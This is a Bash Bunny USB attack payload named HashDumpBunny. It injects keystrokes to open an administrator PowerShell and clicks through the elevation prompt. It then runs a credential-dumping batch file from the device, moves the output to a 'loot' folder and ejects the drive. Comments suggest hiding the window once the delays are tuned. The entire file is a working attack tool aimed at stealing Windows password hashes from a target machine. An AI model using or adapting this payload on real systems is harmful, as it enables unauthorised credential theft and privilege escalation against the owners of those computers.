#!/bin/bash
#
# Title:         HashDumpBunny
# Description:   Dump user hashes with this script, which was obfuscated with multiple layers.
# Author:        0iphor13
# Version:       1.0
# Category:      Credentials
# Attackmodes:   HID, Storage

LED SETUP

Q DELAY 500

GET SWITCH_POSITION
DUCKY_LANG de

Q DELAY 500

ATTACKMODE HID STORAGE

#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING

LED STAGE1

#After you have adapted the delays for your target, add "-W hidden"
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
Q ALT j
Q DELAY 250

Q DELAY 250
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
Q DELAY 250
Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
Q DELAY 250
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER

LED FINISH